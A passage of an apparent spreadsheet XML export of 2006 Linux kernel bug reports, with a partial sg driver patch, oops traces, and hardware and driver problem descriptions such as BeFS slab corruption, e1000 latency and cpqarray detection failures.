+ do { + error = 0; + int tmp_dev_max = sg_dev_max + SG_DEV_ARR_LUMP; + write_unlock_irqrestore(&amp;sg_dev_arr_lock, iflags); + + tmp_da = kzalloc(tmp_dev_max * sizeof(Sg_device *), GFP_KERNEL); + if (unlikely(!tmp_da)) + goto expand_failed; + write_lock_irqsave(&amp;sg_dev_arr_lock, iflags); + if (tmp_dev_max - SG_DEV_ARR_LUMP == sg_dev_max) { + memcpy(tmp_da, sg_dev_arr, sg_dev_max * sizeof (Sg_device *)); + old_sg_dev_arr = sg_dev_arr; + sg_dev_arr = tmp_da; + sg_dev_max = tmp_dev_max; + } else { + kfree(tmp_da); + if (sg_nr_dev &gt;= sg_dev_max) error = 1; + } + } while (error); } for (k = 0; k &lt; sg_dev_max; k++) if (!sg_dev_arr[k]) break; +/* sanity check to make sure we don't overflow the current sg_dev_arr */ + if (unlikely(k &gt;= sg_dev_max)) + panic("Error: sg_dev_arr table full\n"); if (unlikely(k &gt;= SG_MAX_DEVS)) goto overflow; @@ -1439,9 +1449,12 @@ MKDEV(SCSI_GENERIC_MAJOR, k), cl_dev-&gt;dev, "%s", disk-&gt;disk_name); - if (IS_ERR(sg_class_member)) + if (IS_ERR(sg_class_member)) { printk(KERN_WARNING "sg_add: " "class_device_create failed\n"); + error = (int)sg_class_member; + goto out; + } class_set_devdata(sg_class_member, sdp); error = sysfs_create_link(&amp;scsidp-&gt;sdev_gendev.kobj, &amp;sg_class_member-&gt;kobj, "generic"); @@ -1505,12 +1518,13 @@ SCSI_LOG_TIMEOUT(3, printk("sg_detach: dev=%d, dirty\n", k)); if (NULL == sdp-&gt;headfp) { sg_dev_arr[k] = NULL; + sg_nr_dev--; } } else { /* nothing active, simple case */ SCSI_LOG_TIMEOUT(3, printk("sg_detach: dev=%d\n", k)); sg_dev_arr[k] = NULL; + sg_nr_dev--; } - sg_nr_dev--; break; } write_unlock_irqrestore(&amp;sg_dev_arr_lock, iflags);</t>
  </si>
  <si>
    <t>bttv causes Oops when loading</t>
  </si>
  <si>
    <t>2006-07-19 08:37 UTC</t>
  </si>
  <si>
    <t>Martin von Gagern</t>
  </si>
  <si>
    <t>2008-03-26 02:08 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.17-gentoo-r2 Distribution: Gentoo Hardware Environment: 01:0b.0 Multimedia video controller: Brooktree Corporation Bt878 Video Capture (rev 11) Subsystem: Hauppauge computer works Inc. WinTV Series Flags: bus master, medium devsel, latency 64, IRQ 20 Memory at dfffe000 (32-bit, prefetchable) [size=4K] Capabilities: [44] Vital Product Data Capabilities: [4c] Power Management version 2 01:0b.1 Multimedia controller: Brooktree Corporation Bt878 Audio Capture (rev 11) Subsystem: Hauppauge computer works Inc. WinTV Series Flags: bus master, medium devsel, latency 64, IRQ 20 Memory at dffff000 (32-bit, prefetchable) [size=4K] Capabilities: [44] Vital Product Data Capabilities: [4c] Power Management version 2 Software Environment: init=/bin/bash, so nothing special. Problem Description: modprobe bttv causes a kernel Oops: Oops: 0000 [#1] SMP Modules linked in: tuner tvaudio msp3400 tsdev snd_emu10k1 snd_hwdep snd_rawmidi snd_ac97_codec snd_ac97_bus evdev bttv snd_ da_codec snd_seq_device video_buf pcspkr firmware_class snd_util_mem ir_common snd_bt87x compat_ioctl32 i2c_algo_bit snd_pcm art snd_timer btcx_risc uhci_hcd ehci_hcd ohci1394 usbcore tveeprom ieee1394 i2c_i801 snd i2c_core sky2 videodev snd_page_al v4l2_common soundcore emu10k1_gp gameport psmouse parport_pc parport CPU: 0 EIP: 0060:[&lt;c0189367&gt;] Not tainted VLI EFLAGS: 00010282 (2.6.18-rc2 #2) EIP is at sysfs_add_file+0xf/0x70 eax: 00000001 ebx: f89cfd3c ecx: 00000004 edx: f89cfd3c esi: 00000001 edi: f89d6b48 ebp: c2193800 esp: f7f6ddd0 ds: 007b es: 007b ss: 0068 Process modprobe (pid: 1003, ti=f7f6c000 task=f7e0c030 task.ti=f7f6c000) Stack: f8870303 f7fdc624 00000004 00000000 f89d68a0 f89d6b48 c2193800 00000000 f89d68a0 f89d6b48 c2193800 f89bd09c f89c5ff8 00000000 00000000 dfffe000 00000000 00000001 00000001 40222323 f89cfa4c c2193800 f89cfa20 c03cc220 Call Trace: [&lt;f89bd09c&gt;] bttv_probe+0x4c8/0x78c [bttv] [&lt;c022bddf&gt;] pci_device_probe+0x40/0x5b [&lt;c028654b&gt;] driver_probe_device+0x3b/0xaa [&lt;c028668b&gt;] __driver_attach+0x6c/0x6e [&lt;c0285fe4&gt;] bus_for_each_dev+0x3a/0x58 [&lt;c02864ba&gt;] driver_attach+0x16/0x1a [&lt;c0285c96&gt;] bus_add_driver+0x6f/0x122 [&lt;c022bf1e&gt;] __pci_register_driver+0x47/0x68 [&lt;c013359b&gt;] sys_init_module+0x12b/0x1a60 [&lt;c0102b59&gt;] sysenter_past_esp+0x56/0x79 [&lt;b7f72410&gt;] 0xb7f72410 Code: fe ff 81 ff 00 f0 ff ff 77 b6 8b 77 0c 85 f6 75 b1 89 f8 e8 44 17 fe ff 31 ff eb a6 55 57 56 53 83 ec 1c 89 c6 89 d3 8 68 54 8b 42 08 66 89 44 24 0c 8b 46 0c 83 c0 74 e8 86 d7 1b EIP: [&lt;c0189367&gt;] sysfs_add_file+0xf/0x70 SS:ESP 0068:f7f6ddd0 &lt;7&gt;usb usb4: suspend_rh (auto-stop) usb usb5: suspend_rh (auto-stop) Steps to reproduce: 1. Boot 2.6.18-rc2 2. modprobe bttv</t>
  </si>
  <si>
    <t>Kernel BUG at drivers/md/kcopyd.c:146 invalid opcode: 0000 [1] SMP</t>
  </si>
  <si>
    <t>2.6.16-xen</t>
  </si>
  <si>
    <t>2006-07-20 02:45 UTC</t>
  </si>
  <si>
    <t>Tethys</t>
  </si>
  <si>
    <t>2007-11-13 05:54 UTC</t>
  </si>
  <si>
    <t>Distribution: CentOS 4.3 Hardware Environment: 2 x amd64 Software Environment: ??? Problem Description: At 02:30 each morning, our backup script takes LVM snapshots of various (currently 9) filesystems, mounts them and rsyncs the data to a remote machine. This bug seems to have been triggered by the lvremove of the snapshot volume when it was done. It's been running without incident for several months now, and this is the first time it's generated an oops. Jul 20 02:34:16 shelbyville kernel: Kernel BUG at drivers/md/kcopyd.c:146 Jul 20 02:34:16 shelbyville kernel: invalid opcode: 0000 [1] SMP Jul 20 02:34:16 shelbyville kernel: CPU 0 Jul 20 02:34:16 shelbyville kernel: Modules linked in: w83627hf eeprom lm85 hwmon_vid hwmon i2c_isa i2c_dev xt_limit loop bridge nfsd exportfs lockd sunrpc ipv6 xt_state ip_conntrack nfnetlink xt_tcpudp ipt_LOG ipt_REJECT xt_physdev iptable_filter ip_tables x_tables video thermal processor fan container button battery ac ohci_hcd ehci_hcd i2c_nforce2 i2c_core tg3 e100 mii floppy dm_snapshot dm_zero dm_mirror ext3 jbd dm_mod sata_nv 3w_9xxx Jul 20 02:34:16 shelbyville kernel: Pid: 10428, comm: lvremove Not tainted 2.6.16-xen #1 Jul 20 02:34:16 shelbyville kernel: RIP: e030:[&lt;ffffffff88013adc&gt;] &lt;ffffffff88013adc&gt;{:dm_mod:client_free_pages+12} Jul 20 02:34:16 shelbyville kernel: RSP: e02b:ffff880012d3bca8 EFLAGS: 00010287 Jul 20 02:34:16 shelbyville kernel: RAX: 0000000000000100 RBX: ffff8800159f1700 RCX: 0000000000000000 Jul 20 02:34:16 shelbyville kernel: RDX: 0000000000000000 RSI: 0000000000000000 RDI: ffff8800159f1700 Jul 20 02:34:16 shelbyville kernel: RBP: ffffc200002ec080 R08: ffff8800057b3c18 R09: 0000000000000000 Jul 20 02:34:16 shelbyville kernel: R10: 0000000000000000 R11: ffffffff80180650 R12: 0000000000000000 Jul 20 02:34:16 shelbyville kernel: R13: 00000000006b6450 R14: ffffffff88012030 R15: ffffc20000224000 Jul 20 02:34:16 shelbyville kernel: FS: 00002aef4a9a53e0(0000) GS:ffffffff8049d000(0000) knlGS:0000000000000000 Jul 20 02:34:16 shelbyville kernel: CS: e033 DS: 0000 ES: 0000 Jul 20 02:34:16 shelbyville kernel: Process lvremove (pid: 10428, threadinfo ffff880012d3a000, task ffff8800179bc970) Jul 20 02:34:16 shelbyville kernel: Stack: ffff8800159f1700 ffffffff88014614 ffff8800171e3c80 ffffffff880537ce Jul 20 02:34:16 shelbyville kernel: ffff88000dba9080 ffffc200002ec080 ffff8800125fda00 ffffffff8800fa64 Jul 20 02:34:16 shelbyville kernel: ffff8800125fda00 ffff880011d15b00 Jul 20 02:34:16 shelbyville kernel: Call Trace: &lt;ffffffff88014614&gt;{:dm_mod:kcopyd_client_destroy+20} Jul 20 02:34:16 shelbyville kernel: &lt;ffffffff880537ce&gt;{:dm_snapshot:snapshot_dtr+222} &lt;ffffffff8800fa64&gt;{:dm_mod:dm_table_put+100} Jul 20 02:34:16 shelbyville kernel: &lt;ffffffff8801176e&gt;{:dm_mod:__hash_remove+126} &lt;ffffffff88012078&gt;{:dm_mod:dev_remove+72} Jul 20 02:34:16 shelbyville kernel: &lt;ffffffff88012f4e&gt;{:dm_mod:ctl_ioctl+654} &lt;ffffffff80157519&gt;{__alloc_pages+89} Jul 20 02:34:16 shelbyville kernel: &lt;ffffffff8018c1a4&gt;{do_ioctl+116} &lt;ffffffff8018c47d&gt;{vfs_ioctl+685} Jul 20 02:34:16 shelbyville kernel: &lt;ffffffff8018c51a&gt;{sys_ioctl+106} &lt;ffffffff8010b206&gt;{system_call+134} Jul 20 02:34:16 shelbyville kernel: &lt;ffffffff8010b180&gt;{system_call+0} Jul 20 02:34:16 shelbyville kernel: Jul 20 02:34:16 shelbyville kernel: Code: 0f 0b 68 7c 4c 01 88 c2 92 00 48 8b 7b 18 e8 a1 ff ff ff 48 Jul 20 02:34:16 shelbyville kernel: RIP &lt;ffffffff88013adc&gt;{:dm_mod:client_free_pages+12} RSP &lt;ffff880012d3bca8&gt; Jul 20 02:34:16 shelbyville kernel: &lt;1&gt;Unable to handle kernel NULL pointer dereference at 0000000000000040 RIP: Jul 20 02:34:16 shelbyville kernel: &lt;ffffffff8017dec9&gt;{bio_add_page+25} Jul 20 02:34:16 shelbyville kernel: PGD 0 Jul 20 02:34:16 shelbyville kernel: Oops: 0000 [2] SMP Jul 20 02:34:16 shelbyville kernel: CPU 0 Jul 20 02:34:16 shelbyville kernel: Modules linked in: w83627hf eeprom lm85 hwmon_vid hwmon i2c_isa i2c_dev xt_limit loop bridge nfsd exportfs lockd sunrpc ipv6 xt_state ip_conntrack nfnetlink xt_tcpudp ipt_LOG ipt_REJECT xt_physdev iptable_filter ip_tables x_tables video thermal processor fan container button battery ac ohci_hcd ehci_hcd i2c_nforce2 i2c_core tg3 e100 mii floppy dm_snapshot dm_zero dm_mirror ext3 jbd dm_mod sata_nv 3w_9xxx Jul 20 02:34:16 shelbyville kernel: Pid: 402, comm: kcopyd Not tainted 2.6.16-xen #1 Jul 20 02:34:16 shelbyville kernel: RIP: e030:[&lt;ffffffff8017dec9&gt;] &lt;ffffffff8017dec9&gt;{bio_add_page+25} Jul 20 02:34:16 shelbyville kernel: RSP: e02b:ffff8800172d3cd0 EFLAGS: 00010206 Jul 20 02:34:16 shelbyville kernel: RAX: 0000000000000000 RBX: ffff88000079bcc0 RCX: 0000000000001000 Jul 20 02:34:16 shelbyville kernel: RDX: ffff8800012ad510 RSI: ffff88000079bcc0 RDI: ffff88000079bcc0 Jul 20 02:34:16 shelbyville kernel: RBP: 0000000000000010 R08: 0000000000000000 R09: ffff88000af06e00 Jul 20 02:34:16 shelbyville kernel: R10: ffff88000079bcc0 R11: 7fffffffffffffff R12: ffff8800172d3da8 Jul 20 02:34:16 shelbyville kernel: R13: ffff8800086c24e8 R14: ffff880011d159c0 R15: 0000000000000000 Jul 20 02:34:16 shelbyville kernel: FS: 00002aef4a9a53e0(0000) GS:ffffffff8049d000(0000) knlGS:0000000000000000 Jul 20 02:34:16 shelbyville kernel: CS: e033 DS: 0000 ES: 0000 Jul 20 02:34:16 shelbyville kernel: Process kcopyd (pid: 402, threadinfo ffff8800172d2000, task ffff880017b64930) Jul 20 02:34:16 shelbyville kernel: Stack: ffffffff88013524 0000000000000001 ffff8800086c24e8 0000000100000001 Jul 20 02:34:16 shelbyville kernel: ffff8800012ad510 0000000000001000 0000000080155c99 ffffffff88013260 Jul 20 02:34:16 shelbyville kernel: ffffffff88013290 0000000300000000 Jul 20 02:34:16 shelbyville kernel: Call Trace: &lt;ffffffff88013524&gt;{:dm_mod:dispatch_io+340} Jul 20 02:34:16 shelbyville kernel: &lt;ffffffff88013260&gt;{:dm_mod:list_get_page+0} &lt;ffffffff88013290&gt;{:dm_mod:list_next_page+0} Jul 20 02:34:16 shelbyville kernel: &lt;ffffffff88013c20&gt;{:dm_mod:complete_io+0} &lt;ffffffff88013744&gt;{:dm_mod:async_io+196} Jul 20 02:34:16 shelbyville kernel: &lt;ffffffff88013c20&gt;{:dm_mod:complete_io+0} &lt;ffffffff88013910&gt;{:dm_mod:dm_io_async+80} Jul 20 02:34:16 shelbyville kernel: &lt;ffffffff88013260&gt;{:dm_mod:list_get_page+0} &lt;ffffffff88013290&gt;{:dm_mod:list_next_page+0} Jul 20 02:34:16 shelbyville kernel: &lt;ffffffff88013cd0&gt;{:dm_mod:run_io_job+0} &lt;ffffffff88013f20&gt;{:dm_mod:do_work+0} Jul 20 02:34:16 shelbyville kernel: &lt;ffffffff88013d27&gt;{:dm_mod:run_io_job+87} &lt;ffffffff88013e2e&gt;{:dm_mod:process_jobs+30} Jul 20 02:34:16 shelbyville kernel: &lt;ffffffff80141450&gt;{run_workqueue+176} &lt;ffffffff80145460&gt;{keventd_create_kthread+0} Jul 20 02:34:16 shelbyville kernel: &lt;ffffffff801415ea&gt;{worker_thread+330} &lt;ffffffff80127e10&gt;{default_wake_function+0} Jul 20 02:34:16 shelbyville kernel: &lt;ffffffff80127e10&gt;{default_wake_function+0} &lt;ffffffff801414a0&gt;{worker_thread+0} Jul 20 02:34:16 shelbyville kernel: &lt;ffffffff80145419&gt;{kthread+217} &lt;ffffffff8010bc5e&gt;{child_rip+8} Jul 20 02:34:16 shelbyville kernel: &lt;ffffffff80145460&gt;{keventd_create_kthread+0} &lt;ffffffff801b5320&gt;{proc_destroy_inode+0} Jul 20 02:34:16 shelbyville kernel: &lt;ffffffff80145340&gt;{kthread+0} &lt;ffffffff8010bc56&gt;{child_rip+0} Jul 20 02:34:16 shelbyville kernel: Jul 20 02:34:16 shelbyville kernel: Code: 48 8b 78 40 44 0f b7 8f 54 02 00 00 e9 46 fc ff ff 66 66 90 Jul 20 02:34:16 shelbyville kernel: RIP &lt;ffffffff8017dec9&gt;{bio_add_page+25} RSP &lt;ffff8800172d3cd0&gt; Jul 20 02:34:16 shelbyville kernel: CR2: 0000000000000040 It's a kernel.org 2.6.16 tree with Xen patches applied.</t>
  </si>
  <si>
    <t>Kernel boot freezes when APIC is enabled &amp; SATA is used</t>
  </si>
  <si>
    <t>2.6.16.7</t>
  </si>
  <si>
    <t>2006-07-24 03:13 UTC</t>
  </si>
  <si>
    <t>2007-08-10 01:10 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Unable to determine (at least 2.6.11 through 2.6.17) Distribution: Knoppix Hardware Environment: MSI KT6, AMD XP2600+, VIA KT600 chipset (+onboard VIA VT8237 SATA controller), 2x SATA HDD Software Environment: Not applicable (?) Problem Description: When booting with an APIC-enabled kernel (&amp; enabled in the BIOS (both APIC 1.1 &amp; 1.4)) and having at least 1 SATA disk connected causes machine to freeze at "Uncompressing Linux. OK, booting the kernel". When disabling APIC-support in the BIOS (or kernel) fixes the problem. Steps to reproduce: 1) Enable APIC in the kernel 2) Enable APIC (1.1 or 1.4) in the BIOS 3) Hook up one or more SATA disk(s) to the system 4) Boot Linux (Knoppix) I haven't got a clue whether this is a problem in the APIC code or in the VIA SATA driver....</t>
  </si>
  <si>
    <t>ACPI loses PCI wakeup requests</t>
  </si>
  <si>
    <t>2006-07-24 12:26 UTC</t>
  </si>
  <si>
    <t>2009-10-25 10:40 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: None As discussed at OLS, on my Intel-based system the EHCI PCI controller generates a PCI PME (Power Management Event) signal if a USB device is plugged in while the controller is in D3. Presumably the PME signal causes an ACPI interrupt and it should register as a PCI wakeup event, but nothing seems to happen. Attached below is a commented transcript illustrating the problem. If needed, I can attach this computer's DSDT table.</t>
  </si>
  <si>
    <t>lockdep triggers when nfs export is mounted.</t>
  </si>
  <si>
    <t>2.6.18rc2-git6</t>
  </si>
  <si>
    <t>2006-07-28 19:52 UTC</t>
  </si>
  <si>
    <t>2007-08-27 13:23 UTC</t>
  </si>
  <si>
    <t>When I mount an nfsv3 fs, I see this on the server side.. ============================================= [ INFO: possible recursive locking detected ] --------------------------------------------- nfsd/1932 is trying to acquire lock: (&amp;inode-&gt;i_mutex){--..}, at: [&lt;c06075f9&gt;] mutex_lock+0x21/0x24 but task is already holding lock: (&amp;inode-&gt;i_mutex){--..}, at: [&lt;c06075f9&gt;] mutex_lock+0x21/0x24 other info that might help us debug this: 2 locks held by nfsd/1932: #0: (hash_sem){----}, at: [&lt;ccfc44e2&gt;] exp_readlock+0xd/0xf [nfsd] #1: (&amp;inode-&gt;i_mutex){--..}, at: [&lt;c06075f9&gt;] mutex_lock+0x21/0x24 stack backtrace: [&lt;c04051ea&gt;] show_trace_log_lvl+0x54/0xfd [&lt;c04057a6&gt;] show_trace+0xd/0x10 [&lt;c04058bf&gt;] dump_stack+0x19/0x1b [&lt;c043b7ae&gt;] __lock_acquire+0x773/0x997 [&lt;c043bf43&gt;] lock_acquire+0x4b/0x6c [&lt;c060748a&gt;] __mutex_lock_slowpath+0xbc/0x20a [&lt;c06075f9&gt;] mutex_lock+0x21/0x24 [&lt;ccfc1d57&gt;] nfsd_setattr+0x2fb/0x4aa [nfsd] [&lt;ccfc31e3&gt;] nfsd_create_v3+0x31c/0x48c [nfsd] [&lt;ccfc7e12&gt;] nfsd3_proc_create+0x125/0x135 [nfsd] [&lt;ccfbe0d4&gt;] nfsd_dispatch+0xc0/0x178 [nfsd] [&lt;ccf077c3&gt;] svc_process+0x3a4/0x5ee [sunrpc] [&lt;ccfbe5f6&gt;] nfsd+0x197/0x2e1 [nfsd] [&lt;c0402005&gt;] kernel_thread_helper+0x5/0xb</t>
  </si>
  <si>
    <t>sis900 drops tx packets on Foxconn 661FX7MJ-RSH motherboard</t>
  </si>
  <si>
    <t>2.6.15.6-2.6.18-rc2</t>
  </si>
  <si>
    <t>2006-07-29 06:58 UTC</t>
  </si>
  <si>
    <t>Jools Wills</t>
  </si>
  <si>
    <t>2006-08-12 02:05 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur:None Distribution:Ubuntu Hardware Environment: Foxconn 661FXMJ-RSH motherboard onboard sis900 100M ethernet Software Environment: N/A Problem Description: Under high load this device drops outgoing packets resulting in poor throughput and unresponsive (e.g. ssh) sessions during file transfers Steps to reproduce: Transfer any large file via a TCP-based protocol using this onboard ethernet device at 100mbit</t>
  </si>
  <si>
    <t>cpqarray fails to detect array when built as a module</t>
  </si>
  <si>
    <t>2006-07-29 20:17 UTC</t>
  </si>
  <si>
    <t>Joshua Rubin</t>
  </si>
  <si>
    <t>2008-03-28 10:42 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.14 Distribution: Debian (etch) Hardware Environment: Compaq Proliant DL360 Software Environment: n/a Problem Description: When built as a module, cpqarray, since 2.6.15, is unable to detect arrays. Built into the kernel it works fine. The errors are as follows: cpqarray: Finding drives on ida0 cpqarray: ida0: idaSendPciCmd Timeout out, No command list address returned! cpqarray: error sending ID Controller Steps to reproduce: Boot with a Compaq Smart Array card (shows up as "raid controller lsi logic/symbios logic 53C1510 (rev 2)" in lspci) and a valid array. If the kernel is built with cpqarray as a module that is loaded in an initrd, the module is loaded and the array can not be found. If the array contains the root partition, the system (obviously) becomes unbootable.</t>
  </si>
  <si>
    <t>T60 and e1000 long ping</t>
  </si>
  <si>
    <t>2006-07-31 00:29 UTC</t>
  </si>
  <si>
    <t>2007-11-13 10:49 UTC</t>
  </si>
  <si>
    <t>Auke Kok</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur:- Distribution:Debian Sarge Hardware Environment: Thinkpad T60 Software Environment: only kernel Problem Description: Hi, I have new T60 notebook with e1000 network card an Core Duo CPU. E1000 is connected on PCie. If I ping to T60 I get this pings: 64 bytes from 192.168.3.74: icmp_seq=88 ttl=64 time=1000.2 ms 64 bytes from 192.168.3.74: icmp_seq=89 ttl=64 time=0.2 ms 64 bytes from 192.168.3.74: icmp_seq=88 ttl=64 time=1000.2 ms 64 bytes from 192.168.3.74: icmp_seq=89 ttl=64 time=0.2 ms If I ping from T60 to my comp situation is normal. If I disable in kernel config Irq Balancing pings are much better but not the best :-) 64 bytes from 192.168.3.74: icmp_seq=29 ttl=64 time=12.7 ms 64 bytes from 192.168.3.74: icmp_seq=30 ttl=64 time=10.0 ms 64 bytes from 192.168.3.74: icmp_seq=31 ttl=64 time=7.3 ms 64 bytes from 192.168.3.74: icmp_seq=32 ttl=64 time=4.5 ms I tested kernel 2.6.17.1 with included driver and the latest diver from sf.net upgrade BIOS but nothing helps. I also test with NAPI and without NAPI. Steps to reproduce: Compile kernel with SMP irq balancing enabled and ping to T60</t>
  </si>
  <si>
    <t>in_flight counter &lt; 0</t>
  </si>
  <si>
    <t>2.6.16.23</t>
  </si>
  <si>
    <t>2006-07-31 07:01 UTC</t>
  </si>
  <si>
    <t>2006-08-14 22:28 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.14 Distribution: Fedora Core 4 Hardware Environment: any (?) Software Environment: software raid1, raid5 Problem Description: The "I/Os currently in progress" field (=in_flight counter) in /proc/diskstats (or /sys/block/.../stat) does not return to 0 when te system becomes idle Many of our servers running 2.6.16 show negative values for in_flight for various disks. Example: (2 disk server in raid1 setupi, doing next to nothing) $ grep . /sys/block/*/stat | awk '$10 != 0' /sys/block/hda/stat: 9812 489 195403 36420 206379 213861 3362339 9800150 4294916192 277217350 340732862 /sys/block/hdc/stat: 8987 744 226761 29710 206317 213861 3362215 9995640 4294916192 277217330 340920862 (12 disk server in 2x raid5 setup, pretty busy doing I/O) /sys/block/sda/stat: 1828 70 17885 2650 1078290 62482 8748780 83401150 4294429184 1662187980 3203121262 /sys/block/sdb/stat:130843116 2968532896 3320397892 2536327160 6193978 50791697 455955512 337283930 4293588311 3025328220 2218227932 /sys/block/sdc/stat:131392851 2968337956 3323226676 2447175090 5882915 50719217 452886576 321801120 4293588311 3025328210 2113590172 /sys/block/sdd/stat:130906474 2968846397 3323387580 2678805580 5879942 50636473 452201032 346717680 4293588311 3025328250 2370134242 /sys/block/sde/stat:130551130 2969337624 3324476972 2530296920 6012056 50805211 454607832 319752130 4293588311 3025328260 2194657482 /sys/block/sdf/stat:130099826 2969216863 3319924468 2710861760 6198230 50822022 456231488 342026510 4293588312 3025328260 2397491852 /sys/block/sdg/stat:145086526 2985059076 3566441364 2653252150 4952818 76961654 655356352 135631930 4294475069 2958358620 2170989648 /sys/block/sdh/stat:146668696 2983426309 3566036580 2698103840 4966571 76945554 655337312 133157570 4294475069 2958911460 2213364698 /sys/block/sdi/stat:146164615 2983880579 3565638128 2752611230 4858509 77058025 655372912 131101590 4294475069 2959340580 2265813798 /sys/block/sdj/stat:145954178 2984122579 3565890312 2963972560 4976694 76943744 655404080 136300770 4294475069 2960297300 2482371528 /sys/block/sdk/stat:78237852 1544680069 98477312 1312575800 7790008 124375141 1057327464 242402740 4293827850 2953012170 2976220412 /sys/block/sdl/stat:145773358 2984255614 3565507696 2968102890 5049357 76870600 655400896 131659590 4294475069 2960439030 2481853128 The numbers (e.g. 4294475069 = FFF87D3D hex, which looks rather suspicous. On more quiet servers these numbers are closer to 0xFFFFFFFF) appear to be always negative, which might indicate that the in_flight counter gets decremented to enthousiastically. Skimming throught the kernel code I see some tests Steps to reproduce:</t>
  </si>
  <si>
    <t>Slab corruption in BeFS (befs_utf2nls)</t>
  </si>
  <si>
    <t>2006-08-01 23:17 UTC</t>
  </si>
  <si>
    <t>Jens Kilian</t>
  </si>
  <si>
    <t>2006-08-06 11:08 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.8 Distribution: Debian (sarge, with some packages from etch) Hardware Environment: i386 (Dual PIII, Soyo D6IBA2 motherboard) Software Environment: Problem Description: The function befs_utf2nls (in fs/befs/linuxvfs.c) writes a 0 byte past the end of a block of memory allocated via kmalloc(), leading to memory corruption. This happens only for filenames which are pure ASCII and a multiple of 4 bytes in length. Here's a snippet from my syslog (with DEBUG_SLAB turned on; note the values for "redzone 2"): Jul 31 22:03:40 gondolin kernel: slab error in cache_free_debugcheck(): cache `size-32': double free, or memory outside object was overwritten Jul 31 22:03:40 gondolin kernel: [cache_free_debugcheck+461/592] cache_free_debugcheck+0x1cd/0x250 Jul 31 22:03:40 gondolin kernel: [kfree+89/160] kfree+0x59/0xa0 Jul 31 22:03:40 gondolin kernel: [pg0+541965946/1069794304] befs_readdir+0x13a/0x230 [befs] Jul 31 22:03:40 gondolin kernel: [pg0+541965946/1069794304] befs_readdir+0x13a/0x230 [befs] Jul 31 22:03:40 gondolin kernel: [permission+111/160] permission+0x6f/0xa0 Jul 31 22:03:41 gondolin kernel: [vfs_permission+32/48] vfs_permission+0x20/0x30 Jul 31 22:03:41 gondolin kernel: [may_open+85/528] may_open+0x55/0x210 Jul 31 22:03:41 gondolin kernel: [__copy_to_user_ll+112/128] __copy_to_user_ll+0x70/0x80 Jul 31 22:03:41 gondolin kernel: [copy_to_user+66/96] copy_to_user+0x42/0x60 Jul 31 22:03:41 gondolin kernel: [cp_new_stat64+248/272] cp_new_stat64+0xf8/0x110 Jul 31 22:03:41 gondolin kernel: [vfs_readdir+128/160] vfs_readdir+0x80/0xa0 Jul 31 22:03:41 gondolin kernel: [filldir64+0/256] filldir64+0x0/0x100 Jul 31 22:03:41 gondolin kernel: [sys_getdents64+116/208] sys_getdents64+0x74/0xd0 Jul 31 22:03:41 gondolin kernel: [filldir64+0/256] filldir64+0x0/0x100 Jul 31 22:03:41 gondolin kernel: [sysenter_past_esp+84/117] sysenter_past_esp+0x54/0x75 Jul 31 22:03:41 gondolin kernel: dab0ae24: redzone 1: 0x170fc2a5, redzone 2: 0x170fc200. Jul 31 22:03:41 gondolin kernel: slab error in cache_free_debugcheck(): cache `size-32': double free, or memory outside object was overwritten Jul 31 22:03:41 gondolin kernel: [cache_free_debugcheck+461/592] cache_free_debugcheck+0x1cd/0x250 Jul 31 22:03:41 gondolin kernel: [kfree+89/160] kfree+0x59/0xa0 Jul 31 22:03:41 gondolin kernel: [pg0+541965946/1069794304] befs_readdir+0x13a/0x230 [befs] Jul 31 22:03:41 gondolin kernel: [pg0+541965946/1069794304] befs_readdir+0x13a/0x230 [befs] Jul 31 22:03:41 gondolin kernel: [permission+111/160] permission+0x6f/0xa0 Jul 31 22:03:41 gondolin kernel: [vfs_permission+32/48] vfs_permission+0x20/0x30 Jul 31 22:03:41 gondolin kernel: [may_open+85/528] may_open+0x55/0x210 Jul 31 22:03:41 gondolin kernel: [__copy_to_user_ll+112/128] __copy_to_user_ll+0x70/0x80 Jul 31 22:03:42 gondolin kernel: [copy_to_user+66/96] copy_to_user+0x42/0x60 Jul 31 22:03:42 gondolin kernel: [cp_new_stat64+248/272] cp_new_stat64+0xf8/0x110 Jul 31 22:03:42 gondolin kernel: [vfs_readdir+128/160] vfs_readdir+0x80/0xa0 Jul 31 22:03:42 gondolin kernel: [filldir64+0/256] filldir64+0x0/0x100 Jul 31 22:03:42 gondolin kernel: [sys_getdents64+116/208] sys_getdents64+0x74/0xd0 Jul 31 22:03:42 gondolin kernel: [filldir64+0/256] filldir64+0x0/0x100 Jul 31 22:03:42 gondolin kernel: [sysenter_past_esp+84/117] sysenter_past_esp+0x54/0x75 Jul 31 22:03:42 gondolin kernel: dab0ae24: redzone 1: 0x170fc2a5, redzone 2: 0x170fc200. Without DEBUG_SLAB, this leads to further corruption and hard lockups; I believe this is the bug which has made kernels later than 2.6.8 unusable for me. (This must be due to changes in memory management, the bug has been in the BeFS driver since the time it was introduced (AFAICT).) Steps to reproduce: Create a directory (in BeOS, naturally :-) with files named, e.g., "1", "22", "333", "4444", ... Mount it in Linux and do an "ls" or "find". Fix: The obvious fix is to change *out = result = kmalloc(maxlen, GFP_NOFS); to *out = result = kmalloc(maxlen + 1, GFP_NOFS); in befs_utf2nls(). The same fix may be needed for befs_nls2utf().</t>
  </si>
  <si>
    <t>Can't compile drivers/media/video/usbvideo/quickcam_messenger. Seems not in Makefile</t>
  </si>
  <si>
    <t>2.6.18-rc3</t>
  </si>
  <si>
    <t>2006-08-02 03:19 UTC</t>
  </si>
  <si>
    <t>2006-09-03 03:49 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.18-rc3 Distribution: Fedora Core 5.91 Hardware Environment: AMD x86_64 Problem Description: I can enable Logitech quickcam support in .config, but it want be compile. I have to add into drivers/media/video/Makefile: obj-$(CONFIG_USB_QUICKCAM_MESSENGER) += usbvideo/</t>
  </si>
  <si>
    <t>Initio 1530 sbp2 controller not recognized properly</t>
  </si>
  <si>
    <t>2006-08-02 12:19 UTC</t>
  </si>
  <si>
    <t>piergiorgio.sartor</t>
  </si>
  <si>
    <t>2006-10-01 15:38 UTC</t>
  </si>
  <si>
